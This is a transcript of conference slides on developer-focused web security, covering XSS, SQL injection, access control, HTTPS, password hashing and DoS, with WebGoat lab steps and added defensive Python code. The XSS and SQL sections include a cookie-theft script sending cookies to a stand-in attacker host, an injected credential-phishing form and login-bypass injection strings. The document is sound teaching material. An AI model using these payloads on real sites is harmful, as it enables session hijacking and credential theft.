Devbeat Conference - Developer First Security
michael-coates
Transcript of Devbeat Conference - Developer First Security
Developer-first security: Integrating Security into Development
Michael Coates
[email protected] michael-coates.blogspot.com
@_mwc
About Me
Reality
“The global cost of cybercrime is greater than the combined effect on the global economy of trafficking in marijuana, heroin and cocaine”
http://www.theregister.co.uk/2011/09/07/cost_is_more_than_some_drug_trafficking
http://uk.norton.com/content/en/uk/home_homeoffice/html/cybercrimereport/
Data Loss & Breaches
Verizon Data Breach Report 2013, datalossdb.org
Outside Attackers
Verizon Data Breach Report 2013, datalossdb.org
Security - Into The Details
• Sample and Demo of Top Application Risks — Cross Site Scripting, SQL Injection, Access Control
• Who’s Monitoring Your Traffic? — Encrypting in Transit
• Secure Data Storage & Protection — Correct Password Storage & Data Protection
• Growing Threats Plaguing Applications
WARNING
Security Testing is
ILLEGAL ON UNAUTHORIZED SYSTEMS
Cross Site Scripting SQL Injection Access Control
3 Dangerous Vulnerabilities
What are Web Requests
• Open console & enter the following:
telnet google.com 80
GET / HTTP/1.1
• Hit return 2 times
Cross Site Scripting (XSS)
• Problem: User controlled data returned in HTTP response contains HTML/JavaScript code
• Impact: Session Hijacking, Full Control of Page, Malicious Redirects
• Basic XSS Test: "><script>alert(document.cookie)</script>
• Cookie Theft Example: "><script>document.location='http://attackersite/'+document.cookie</script>
XSS Behind The Scenes
http://shinypage.com?user=Bob
JSP Code: <h1>Glad to see you <%= request.getParameter("name") %></h1>
HTML Source: <div>Glad to see you <b>Bob</b></div>
Rendered HTML
XSS Behind The Scenes
http://shinypage.com?user=friend</b><br><form method="post" action="badsite.com/login"> Login: <input type="text" name="username"><br> Password:<input type="password" name="password"><input type="submit" value="Submit" /></form>
XSS - Injecting HTML
Rendered HTML
Cross Site Scripting
• Cross Site Scripting typically uses JavaScript to do bad things
• Steal session cookies: <script>alert(document.cookie)</script>
• Redirect to bad pages: <script>window.location = "http://evilsite.com/"</script>
• Rewrite page on the fly
Lab! - Reflected XSS
Reflected XSS Lab
• Lesson: Cross-Site Scripting -> Reflected XSS Attacks
• Proxy Not Needed
Lab! - Stored XSS
Stored XSS Lab
• Lesson: Cross-Site Scripting -> Stored XSS Attacks
• Proxy Not Needed
XSS Prevention
• Solution
1. Output Encoding - converts command characters to benign characters for display
2. Input Validation
HTML Encoding:
<  ->  &lt;
>  ->  &gt;
"  ->  &quot;
'  ->  &#x27;
&  ->  &amp;
<h1>Glad to see you <%=encodeForHTML( request.getParameter("name") ) %></h1>
XSS Attempt Revisited
http://shinypage.com?user=friend</b><br><form method="post" action="badsite.com/login"> Login: <input type="text" name="username"><br> Password:<input type="password" name="password"><input type="submit" value="Submit" /></form>
Safe Handling
Glad to see you friend</b> <br><form method="post" action="badsite.com/login"> Login: <input type="text" name="username"><br> Password:<input type="password" name="password"><input type="submit" value="Submit" /></form>
Rendered HTML (the markup is displayed as text, not executed)
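The following is an added Python example, not code from the slides, showing the output-encoding fix above: the slide's login-form payload is rendered both the vulnerable way (concatenated into the page) and the safe way (encoded at the point of output). `ATTACK_NAME` is a constructed copy of the slide's payload and `encode_for_html` stands in for the slide's `encodeForHTML`; Python's `html.escape` does the five-character encoding listed on the slide.

```python
import html

# Constructed sample: the login-form injection from the slide's XSS example.
ATTACK_NAME = ('friend</b><br><form method="post" action="badsite.com/login">'
               ' Login: <input type="text" name="username"><br>'
               ' Password:<input type="password" name="password">'
               '<input type="submit" value="Submit" /></form>')


def render_vulnerable(name):
    """Mirrors the unsafe JSP: the parameter is concatenated straight into HTML."""
    return f"<h1>Glad to see you {name}</h1>"


def encode_for_html(value):
    """HTML-encode the command characters < > " ' & so the browser shows them as
    text instead of parsing them as markup (assumed stand-in for encodeForHTML)."""
    return html.escape(str(value), quote=True)


def render_safe(name):
    """Mirrors the fixed JSP: encode on output, at the point where data meets HTML."""
    return f"<h1>Glad to see you {encode_for_html(name)}</h1>"


def contains_markup(rendered):
    """Demo check: did any tag from the payload survive into the page as markup?"""
    return any(tag in rendered for tag in ("<form", "<input", "<script"))


if __name__ == "__main__":
    print(render_vulnerable(ATTACK_NAME))  # form tags reach the browser as HTML
    print(render_safe(ATTACK_NAME))        # form tags reach the browser as text
```

Encoding belongs at the output boundary rather than at input time: the same string may be written to HTML, to a JavaScript string, or to a SQL query, and each context needs its own encoding.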
XSS Resources
• OWASP XSS Prevention Cheat Sheet - http://bit.ly/XSS-OWASP
• Content Security Policy - http://bit.ly/CSP-OWASP
• OWASP XSS Overview - http://bit.ly/OWASPXSS
SQL Injection
• Problem: User controlled data improperly used with SQL statements
• Impact: Arbitrary SQL Execution, Data Corruption, Data Theft
• Basic SQL Injection Tests: OR 1=1 --   ' OR '1'='1'--
• Example Vulnerable Query: sqlQ = "Select user from UserTable where name= '" + username + "' and pass = '" + password + "'"
Lab! - SQL Lesson
SQL Injection
• Lesson: Injection Flaws -> Lab: SQL Injection -> Stage 1: String SQL Injection
• Proxy Needed
• Objective: Bypass the login page by inserting “control” characters. Login as “Neville” w/o knowledge of the password
SQL Injection
• HTTP Post: employee_id=112&password=x' OR '1'='1 &action=Login
• Vulnerable SQL: Select user from UserTable where name= '" + username + "' and pass = '" + password + "'
• Resulting Statement: Select user from UserTable where name= '112' and pass = 'x' OR '1'='1'
• Result: ... name = '112' and pass = 'x' OR TRUE
SQL Injection
• Parameterized Queries: No confusion with control characters. Example: would look for a password of ' or '1'='1
• Input Validation: Are special characters needed for most fields? What about non-printable characters %00-%0A?
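An added Python example (not from the slides) that runs the login query from the lab both ways against a constructed in-memory SQLite table: the concatenated version accepts the slide's `x' OR '1'='1` password, the parameterized version treats the same input as a literal password string and rejects it. The table columns (`id`, `name`, `pass`) and the sample rows are assumptions for the demo.

```python
import sqlite3


def build_db():
    """Constructed in-memory table standing in for the slide's UserTable."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE UserTable (id INTEGER, name TEXT, pass TEXT)")
    conn.executemany("INSERT INTO UserTable VALUES (?, ?, ?)",
                     [(1, "112", "s3cret-pw"), (2, "Neville", "another-pw")])
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """The slide's pattern: string concatenation. Attacker input becomes part of
    the SQL grammar, so `x' OR '1'='1` turns the WHERE clause into ... OR TRUE.
    Returns the matched name, or None."""
    sql = ("SELECT name FROM UserTable WHERE name = '" + username +
           "' AND pass = '" + password + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_parameterized(conn, username, password):
    """Parameterized query: the statement text is fixed and the values travel
    separately, so quote characters in the input are only ever compared as data."""
    sql = "SELECT name FROM UserTable WHERE name = ? AND pass = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = build_db()
    payload = "x' OR '1'='1"
    print("concatenated :", login_vulnerable(db, "112", payload))    # a row comes back
    print("parameterized:", login_parameterized(db, "112", payload)) # None
```

The parameterized form also removes the need to escape quotes by hand; input validation on top of it is still worthwhile for fields that never legitimately contain such characters.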
SQL Injection Resources
• https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
Access Control
• Problem: Developers assume some parts of app can’t be seen, tampered with or invoked by the user
• Impact: Unauthorized data access, access to privileged functionality
• Basic Access Control Test: Inspect HTTP requests - iterate numbers, guess other values for arguments
• Access Control Failure Example:
• http://somebadbank.com/showacct?id=101
• http://somebadbank.com/showacct?id=102
Lab! - Access Control
Access Control Violation
• Lesson: Access Control Flaws -> LAB: Role Based Access Control -> Stage 1: Bypass Business Layer Access Control
• Proxy Needed
• Objective: Find way to execute “delete” functionality using Tom’s account. Delete account “tom”
Access Control Violation
• Hint: Login with Tom and perform available actions (search staff, view profile). Figure out how action name is sent to server
POST /webgoat/attack?Screen=43&menu=200 HTTP/1.1
Host: localhost

employee_id=105&action=ViewProfile
Strong Access Controls
• Access Control Performed Server Side
• Never Relies Upon “Security by Obscurity”
• Be Careful with Identifiers (e.g. id=123)
• Attacker Can Send Anything in Request
• Presentation Layer Controls Can Not Enforce Access Control
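An added Python example (not from the slides) of the server-side checks the list above calls for, applied to the two request shapes shown earlier: the `showacct?id=NNN` identifier and the `action=ViewProfile` / `action=Delete` parameter. Ownership, roles and balances are constructed sample data; `Forbidden` stands in for an HTTP 403. The point is that the id and the action name are both attacker-controlled, so neither the link the user was given nor the menu they were shown decides anything.

```python
# Constructed sample data standing in for the application's own records. In a
# real app these come from the server-side session and database, never from the request.
ACCOUNT_OWNER = {101: "alice", 102: "bob"}
ACCOUNT_BALANCE = {101: 250, 102: 9000}
ROLES = {"alice": {"user"}, "bob": {"user"}, "tom": {"user"}, "admin1": {"user", "admin"}}
REQUIRED_ROLE = {"ViewProfile": "user", "SearchStaff": "user", "Delete": "admin"}


class Forbidden(Exception):
    """Raised where a real handler would return HTTP 403."""


def can_view_account(session_user, raw_id):
    """The id arrives as an untrusted query-string value (showacct?id=102)."""
    try:
        account_id = int(raw_id)
    except (TypeError, ValueError):
        return False
    return ACCOUNT_OWNER.get(account_id) == session_user


def show_account(session_user, raw_id):
    """Ownership is checked on the server against the logged-in user, so
    iterating id=101, 102, ... only ever returns the caller's own account."""
    if not can_view_account(session_user, raw_id):
        raise Forbidden(f"{session_user} may not view account {raw_id}")
    return ACCOUNT_BALANCE[int(raw_id)]


def can_perform(session_user, action):
    """Action names also arrive in the request body (action=ViewProfile). The
    server, not the presentation layer, maps each action to the role it needs;
    unknown actions are denied by default."""
    needed = REQUIRED_ROLE.get(action)
    return needed is not None and needed in ROLES.get(session_user, set())


def perform_action(session_user, action, target):
    if not can_perform(session_user, action):
        raise Forbidden(f"{session_user} may not invoke {action}")
    return f"{action} on {target} by {session_user}"


if __name__ == "__main__":
    print(show_account("alice", "101"))                  # 250
    print(perform_action("tom", "ViewProfile", "tom"))  # allowed
    print(can_perform("tom", "Delete"))                  # False: admin role required
```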
Access Control Resources
• https://www.owasp.org/index.php/Access_Control_Cheat_Sheet
Who’s Monitoring Your Traffic?
Insecure Session Management
• Secure login over HTTPS
• Password submitted encrypted
• Immediate redirect to HTTP
• Session ID sent cleartext <-- vulnerability point
https://site.com/login
http://site.com/profile
Vulnerable Redirects
• User requests HTTP page, response redirects to HTTPS
• 302 Response is HTTP <-- Vulnerability Point
Secure Design for Communication
• Use HTTPS Throughout Web Site
• HTTP Strict Transport Security (HSTS)
• Opt-in security control
• Website instructs compatible browser to enable STS for site
• HSTS Forces (for enabled site):
• All communication over HTTPS
• No insecure HTTP requests sent from browser
• No option for user to override untrusted certificates
Strict Transport Security
• Browser prevents HTTP requests to HSTS site
• Any request to site is “upgraded” to HTTPS
• No clear text HTTP traffic ever sent to HSTS site
• Browser assumes HTTPS for HSTS sites
Secure Data Storage & Protection
Password Storage
Bad Approaches
• Your own algorithm
• md5
• sha1
• encryption
• base64 encoding
• rot 13
Good Approach
• Bcrypt
• PBKDF2
+ Per User Salt
What Are We Protecting?
Correct password hashing protects against:
• Offline attacks of password repository
• Brute Force, Rainbow Attacks
Does not address:
• Guessing easy passwords
• Password theft, disclosure
• Session Hijacking
• Credential Stuffing
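An added Python example (not from the slides) of the "good approach" above using PBKDF2 with a per-user random salt, alongside unsalted MD5 from the "bad approaches" list to show why the salt matters: two users with the same password get identical MD5 values (one rainbow-table lookup breaks both), while the PBKDF2 records differ and each must be attacked separately. PBKDF2 is used rather than bcrypt because it ships in Python's standard library; the iteration count and the record format are assumptions for the demo.

```python
import base64
import hashlib
import hmac
import os

# Assumed work factor: choose the largest count your login latency budget allows.
ITERATIONS = 300_000


def hash_password(password, salt=None):
    """PBKDF2-HMAC-SHA256 with a 16-byte random salt per user. The record carries
    its own parameters so the iteration count can be raised later for new hashes."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return "pbkdf2_sha256$%d$%s$%s" % (
        ITERATIONS,
        base64.b64encode(salt).decode("ascii"),
        base64.b64encode(dk).decode("ascii"),
    )


def verify_password(password, stored):
    """Recompute with the stored salt and iteration count; compare in constant time."""
    parts = stored.split("$")
    if len(parts) != 4 or parts[0] != "pbkdf2_sha256":
        return False
    _algo, iterations, salt_b64, dk_b64 = parts
    salt = base64.b64decode(salt_b64)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, int(iterations))
    return hmac.compare_digest(dk, base64.b64decode(dk_b64))


def unsalted_md5(password):
    """One of the slide's bad approaches, included only to show the failure:
    fast, and identical for every user who picked the same password."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


if __name__ == "__main__":
    # Constructed sample: two users who happen to share a password.
    print(unsalted_md5("MyP0n3y") == unsalted_md5("MyP0n3y"))    # True: same digest
    a, b = hash_password("MyP0n3y"), hash_password("MyP0n3y")
    print(a == b)                                                # False: different salts
    print(verify_password("MyP0n3y", a), verify_password("x", a))  # True False
```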
Architecture for Sensitive Data
Diagram: browser -> https://site.com -> web server -> internal SSL -> database
Monitor Database Queries & Response Size
Encrypting Sensitive Data in Database
Diagram: the database holds User Data encrypted under a Customer/Group Encryption Key; that key is itself stored as Encrypted [Customer/Group Encryption Key] under a Key Encrypting Key (Encrypt / Decrypt)
Encryption within Database
• Unique keys per data region
• Key encrypting keys
• Hardware Security Modules
Diagram: Hardware Security Module
Growing Threats Plaguing Applications
Denial of Service
Denial of Service (DOS)
Distributed Denial of Service (DDOS)
Denial of Service
Diagram: Application Layer DDOS (site.com/generateReport, exhausts server CPU/Memory) vs Network DDOS (exhausts network bandwidth)
Application Denial of Service
Traditional Network DDOS
• overwhelms target with volume
• exhausts bandwidth / capacity of network devices
• Requires large number of machines
• Defenses: CDN, anti-DDOS services
Application DDOS
• invokes computationally intense application functions
• exhausts CPU / memory of web servers
• Requires few machines
• Defenses: Few available, must customize
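An added Python example (not from the slides) of the kind of customized defense the last bullet refers to: a per-client cost budget in front of computationally expensive functions such as the `generateReport` endpoint from the diagram. Each endpoint is charged a relative cost and each client drains a token bucket that refills slowly, so a handful of machines hammering the expensive function are throttled while ordinary browsing of cheap pages continues. The endpoint costs, bucket size and refill rate are constructed values; the clock is injected so the demo is deterministic.

```python
import time

# Constructed relative costs: the report generator is five times the price of a page view.
ENDPOINT_COST = {"/generateReport": 5, "/index": 1}


class CostBudget:
    """Token bucket per client keyed on whatever identity you have (IP, session)."""

    def __init__(self, capacity, refill_per_sec, clock=time.monotonic):
        self.capacity = capacity
        self.refill = refill_per_sec
        self.clock = clock
        self.state = {}  # client -> (tokens remaining, time of last update)

    def allow(self, client, path):
        """Charge the request's cost to the client's bucket; False means reject
        (HTTP 429 / 503) before the expensive work is started."""
        cost = ENDPOINT_COST.get(path, 1)
        now = self.clock()
        tokens, last = self.state.get(client, (self.capacity, now))
        tokens = min(self.capacity, tokens + (now - last) * self.refill)
        if tokens >= cost:
            self.state[client] = (tokens - cost, now)
            return True
        self.state[client] = (tokens, now)
        return False


if __name__ == "__main__":
    budget = CostBudget(capacity=10, refill_per_sec=1.0)
    for i in range(4):
        print(i, budget.allow("10.0.0.1", "/generateReport"))  # True, True, False, False
    print(budget.allow("10.0.0.1", "/index"))                  # cheap page still served? (0 tokens left: False)
```

Network-layer defenses cannot see this, since the traffic is small and well formed; only the application knows which of its own functions are expensive.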
Credential Stuffing
Diagram: credentials stolen from a compromised server (joe: abc123, sue: password1, bob: MyP0n3y) are replayed one by one against https://site.com/login
Take Aways
• Understand top security threats and anticipate potential malicious use of application to design secure code
• Multiple controls possible to protect sensitive data in transit and storage
• Understand emerging threats to plan for appropriate defenses
• Use OWASP BWA Security Lab and learn more!
Thanks!
http://michael-coates.blogspot.com
@_mwc
Virtual Security Training Lab Setup
Software
• Vulnerable Server: OWASP’s Webgoat
• Proxy Tool - OWASP’s ZAP (Zed Attack Proxy)
• Browser
• Virtual Machine: OWASP Broken Web App VM
Test Connectivity to VM
1. Open Browser
2. Browse to your VM ip (listed in VM login page)
• e.g. http://192.168.56.101
3. Should see OWASP BWA welcome page
4. Error? Check ip address of VM
WebGoat
• Click First Link - OWASP WebGoat version 5.3.x
• Username / Password is guest / guest
Understanding the Proxy
• Proxy is middle-man between browser and web server
• Assists with traffic manipulation & inspection
Diagram: Attacker’s Browser (Primary OS) -> Web Proxy -> Web Server (VM)
Understanding the Proxy
Diagram: Browser -> Web Proxy -> Web Server (Your Computer)
Enabling Proxy
1. Open ZAP
2. Configure Firefox to use proxy
3. Resend Request
4. Confirm received by proxy
5. Forward to web server (vm)
Using A Proxy
• ZAP - Configure to listen on 8080
Set Firefox Proxy
• Set Firefox proxy to 8080
• Preferences -> Advanced -> Network -> Settings
• Set HTTP Proxy
• Important - clear “No Proxy for” line
Confirm Setup Works
• Refresh Web Browser
• Go to ZAP
• See site in left-hand column
Intercepting Traffic
• Add a “breakpoint” by right clicking on the page and choosing “Break...”
• Refresh the webpage - it will hang
• Modify the request as needed, then press the “Continue” button
“Hello World” of Proxies
• Lesson: General -> Http Basic
• Objective:
• Enter your name into text box
• Intercept with proxy & change entered name to different value
• Receive response & observe modified value is reversed
Diagram: Attacker’s Browser sends "Joe" -> Web Proxy changes it to "Sue" -> Web Server replies with the reversed value "euS"